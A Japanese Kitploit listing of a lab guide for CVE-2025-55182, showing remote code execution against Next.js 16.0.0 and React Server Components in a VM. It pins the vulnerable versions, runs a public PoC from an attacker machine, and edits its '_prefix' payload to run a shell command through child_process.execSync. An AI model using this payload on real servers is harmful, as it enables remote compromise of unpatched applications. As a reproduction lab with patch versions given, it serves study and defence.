Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2025-55182-poc-test — CVE-2025-55182 の再現可能なラボ。Next.js 16.0.0 と React Server Components に対するリモートコード実行の実証、外部エクスプロイトの実行および副作用の検証を含む。 | Kitploit
ツール/GitHubGitHub/jandelima/cve-2025-55182-poc-test
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubjandelima/cve-2025-55182-poc-test

cve-2025-55182-poc-test

CVE-2025-55182 の再現可能なラボ。Next.js 16.0.0 と React Server Components に対するリモートコード実行の実証、外部エクスプロイトの実行および副作用の検証を含む。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
8ヶ月前未レビュー

CVE-2025-55182 デモンストレーションラボ (Next.js / React RSC RCE)

このドキュメントは、Multipass Ubuntu VM 内で動作する脆弱性のある Next.js + React Server Components 環境に対する CVE-2025-55182 リモートコード実行 (RCE) を実証するための、完全で再現可能なセットアップを提供します。

エクスプロイトは VM の外部 から実行され、リモートでの悪用可能性を証明するとともに、異常な動作の検出に向けた環境を準備します。

ソース: https://github.com/ejpir/CVE-2025-55182-research


1. Ubuntu VM の作成と準備

2. VM 内部の基本セットアップ

2.1 システムの更新と依存関係のインストール

root@kitploit:~
sudo apt update && sudo apt upgrade -y
sudo apt install -y curl git build-essential

2.2 Node.js LTS (20.x) のインストール

root@kitploit:~
curl -fsSL https://deb.nodesource.com/setup_20.x | sudo -E bash -
sudo apt install -y nodejs

確認:

root@kitploit:~
node -v
npm -v

2.3 アプリケーション用の専用ユーザーの作成

root@kitploit:~
sudo adduser reactlab
sudo usermod -aG sudo reactlab
su - reactlab

3. 脆弱性のある Next.js アプリケーションのデプロイ

3.1 作業ディレクトリの作成

root@kitploit:~
mkdir ~/react2shell-lab
cd ~/react2shell-lab

3.2 最小限の Next.js App Router プロジェクトの生成

root@kitploit:~
npx create-next-app@latest vulnerable-app
cd vulnerable-app

3.3 package.json で脆弱性のあるバージョンを固定

依存関係の編集:

root@kitploit:~
"dependencies": {
  "next": "16.0.0",
  "react": "19.1.0",
  "react-dom": "19.1.0"
}

パッケージの再インストール:

root@kitploit:~
rm -rf node_modules package-lock.json
npm install

確認:

root@kitploit:~
npm list react react-dom next

期待される出力:

root@kitploit:~
[email protected]
[email protected]
[email protected]

3.4 プロダクションモードでのビルドと実行

root@kitploit:~
npm run build
npm start

期待される出力:

root@kitploit:~
▲ Next.js 16.0.0
Local:   http://localhost:3000
Network: http://10.X.X.X:3000

開始画面


4. 外部からのアクセス確認 (攻撃者マシン → VM)

別のマシンで:

root@kitploit:~
curl http://10.102.169.126:3000

Next.js のデフォルト HTML ページが返ってくるはずです。


5. 攻撃者マシンでの PoC のクローンとテスト

5.1 リポジトリのクローン

root@kitploit:~
cd ~
git clone https://github.com/ejpir/CVE-2025-55182-research
cd CVE-2025-55182-research

5.2 PoC のサーバー IP への指定

次の箇所を探す:

root@kitploit:~
hostname: 'localhost',

次のように置き換える:

root@kitploit:~
hostname: '10.X.X.X',

5.3 基本 PoC の実行 (シンプルな console.log RCE)

Next が実行中の状態で:

root@kitploit:~
node test-simple.cjs

Next.js のターミナルに期待される出力:

root@kitploit:~
NON-CHUNKED-RCE

これにより、脆弱性のあるバージョンを使った React Flight 経由のリモートコード実行 が確認できます。

確認


6. 可視的な副作用 (ファイル作成) を実行する PoC の修正

目標は、観測可能な動作 (ファイルシステム + プロセス実行) を生成することです。

6.1 test-simple.cjs 内の _prefix の編集

次の箇所を探す:

root@kitploit:~
"_prefix": "console.log('NON-CHUNKED-RCE');//"

次のように置き換える:

root@kitploit:~
"_prefix": "process.mainModule.require('child_process').execSync('touch /tmp/cve-2025-55182-syscall');console.log('NON-CHUNKED-RCE');//"

注意: 実行コンテキストでは require は利用できませんが、process.mainModule.require() は利用できます。

6.2 修正したエクスプロイトのテスト

Next が実行中であることを確認してから:

root@kitploit:~
node test-simple.cjs

ファイル作成の確認:

root@kitploit:~
ls -l /tmp/

次のように表示されるはずです:

root@kitploit:~
cve-2025-55182-syscall

これにより、副作用を伴う機能的な RCE が確認できます。

開始画面


パッチ:
React ≥ 19.2.1
Next.js ≥ 16.0.7

ツールをダウンロード